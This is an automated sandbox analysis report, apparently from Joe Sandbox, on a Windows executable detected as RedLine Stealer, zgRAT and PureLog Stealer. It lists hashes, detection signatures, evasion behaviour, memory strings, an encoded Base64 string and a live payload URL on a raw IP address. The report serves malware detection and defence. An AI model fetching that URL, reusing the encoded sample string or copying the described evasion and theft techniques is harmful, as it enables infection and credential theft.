Windows Analysis Report
justleadership.exe

Overview

General Information

Sample name: justleadership.exe
Analysis ID: 1534477
MD5: d84496a9a986a9425b66d64560d8f1e1
SHA1: fc41adcfe2cbbaafd65e1a7b817c8dbc3d1c3585
SHA256: e92953ea4524720f25dab095abcfea67bb3df1b26d4bec4c2c7084fc48d0e362
Tags: exe, RedLineStealer, user-abuse_ch

Detection

PureLog Stealer, RedLine, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Downloads files with wrong headers with respect to MIME Content-Type
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale, apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla. zgRAT also has infostealer functionality that targets browser information and cryptowallets. It usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

Source: justleadership.exe Avira: detected
Source: justleadership.exe ReversingLabs: Detection: 60%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: justleadership.exe Joe Sandbox ML: detected
Source: justleadership.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: justleadership.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06B6CAFEh 0_2_06B6CA80
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06B6D3C5h 0_2_06B6D1F8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06B6CAFEh 0_2_06B6CA70
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06B6D3C5h 0_2_06B6D1EA
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06D3FA8Fh 0_2_06D3FA19
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06D3FA8Fh 0_2_06D3FA28
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4x nop then jmp 06D3FA8Fh 0_2_06D3FB87

Networking

Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 20:48:00 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 09 Oct 2024 11:25:43 GMT ETag: "108410-6240983b13bc0" Accept-Ranges: bytes Content-Length: 1082384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf
Source: global traffic HTTP traffic detected: GET /mime/Fwkbz.pdf HTTP/1.1Host: 91.208.206.5Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.206.5
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $kq3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\kq equals www.youtube.com (Youtube)
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\kq equals www.youtube.com (Youtube)
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `,kq#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.208.206.5
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.208.206.5/mime/Fwkbz.pdf
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: justleadership.exe, 00000004.00000002.2156474669.0000000006410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htms
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.s
Source: justleadership.exe, 00000004.00000002.2151184408.00000000032C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/v9/users/
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D38430 NtResumeThread, 0_2_06D38430
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D37380 NtProtectVirtualMemory, 0_2_06D37380
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D38428 NtResumeThread, 0_2_06D38428
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D37379 NtProtectVirtualMemory, 0_2_06D37379
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_0173F6B0 0_2_0173F6B0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_0173D6C4 0_2_0173D6C4
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_0173F6A2 0_2_0173F6A2
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A45F12 0_2_06A45F12
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4D2F0 0_2_06A4D2F0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A43BF0 0_2_06A43BF0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4730C 0_2_06A4730C
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4A440 0_2_06A4A440
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4A450 0_2_06A4A450
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A43BE1 0_2_06A43BE1
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4CB48 0_2_06A4CB48
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A40007 0_2_06A40007
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A40040 0_2_06A40040
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A967B0 0_2_06A967B0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A9B6A0 0_2_06A9B6A0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A9B693 0_2_06A9B693
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A967A1 0_2_06A967A1
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A9B0E8 0_2_06A9B0E8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A9B0D9 0_2_06A9B0D9
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B6DCCD 0_2_06B6DCCD
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B6E3D0 0_2_06B6E3D0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B698B8 0_2_06B698B8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B80040 0_2_06B80040
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B881C8 0_2_06B881C8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B8C121 0_2_06B8C121
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B8D738 0_2_06B8D738
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B8C457 0_2_06B8C457
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B80006 0_2_06B80006
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B881B8 0_2_06B881B8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B88C33 0_2_06B88C33
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B88845 0_2_06B88845
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06C00040 0_2_06C00040
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06C00034 0_2_06C00034
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D31E88 0_2_06D31E88
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D34FB0 0_2_06D34FB0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D3D2E0 0_2_06D3D2E0
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D3CA10 0_2_06D3CA10
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D34310 0_2_06D34310
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D3C6C8 0_2_06D3C6C8
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D31E78 0_2_06D31E78
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D34300 0_2_06D34300
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D33911 0_2_06D33911
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06D33920 0_2_06D33920
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06E8CE48 0_2_06E8CE48
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06E70040 0_2_06E70040
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06E70006 0_2_06E70006
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4_2_018A7740 4_2_018A7740
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4_2_018A748B 4_2_018A748B
Source: C:\Users\user\Desktop\justleadership.exe Code function: 4_2_018A7498 4_2_018A7498
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBalsas.exe" vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGtzoki.dll" vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2123072673.0000000003644000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBalsas.exe" vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2119536181.000000000140E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2157878459.0000000006870000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameGtzoki.dll" vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs justleadership.exe
Source: justleadership.exe, 00000004.00000002.2147404072.0000000000456000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBalsas.exe" vs justleadership.exe
Source: justleadership.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: justleadership.exe, -.cs Cryptographic APIs: 'CreateDecryptor'
Source: justleadership.exe, Mfitkt.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: justleadership.exe, -.cs Base64 encoded string: 'ykCFYv5qt2uTcPdi+k2fefUp2EqFc/Zl9UDNUf5z3FeCZOJG6kqTe/lr4AKRc+9Y30yaetVm9FzNeetY0FeTZ+5m9VCCb6Bg/E2pWv5p/k2eLdxi7W2PZv5B61abXvpp/VWTLfxi7Wa4d/ZionCYcv5/1l/NRP5m/WqCZPJp/gK3cv88/lyCScto6lCCf/Rpol6TYsRE7EuEc/Vz3Vabd/JpomqTYt9m7VjNJKg/qA3NV+h0/FSUeuJU/EuAc+k8ylCbZvdi2EqFc/Zl9UCzbutr9kuTZKBl+FuTeu1qokqbefBi7VyFYg=='
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine Classification label: mal100.troj.evad.winEXE@4/1@0/1
Source: C:\Users\user\Desktop\justleadership.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\justleadership.exe.log
Source: C:\Users\user\Desktop\justleadership.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
Source: justleadership.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: justleadership.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\justleadership.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: justleadership.exe ReversingLabs: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe"
Source: C:\Users\user\Desktop\justleadership.exe Process created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe"
Source: C:\Users\user\Desktop\justleadership.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\justleadership.exe Process created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe"
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: dnsapi.dll
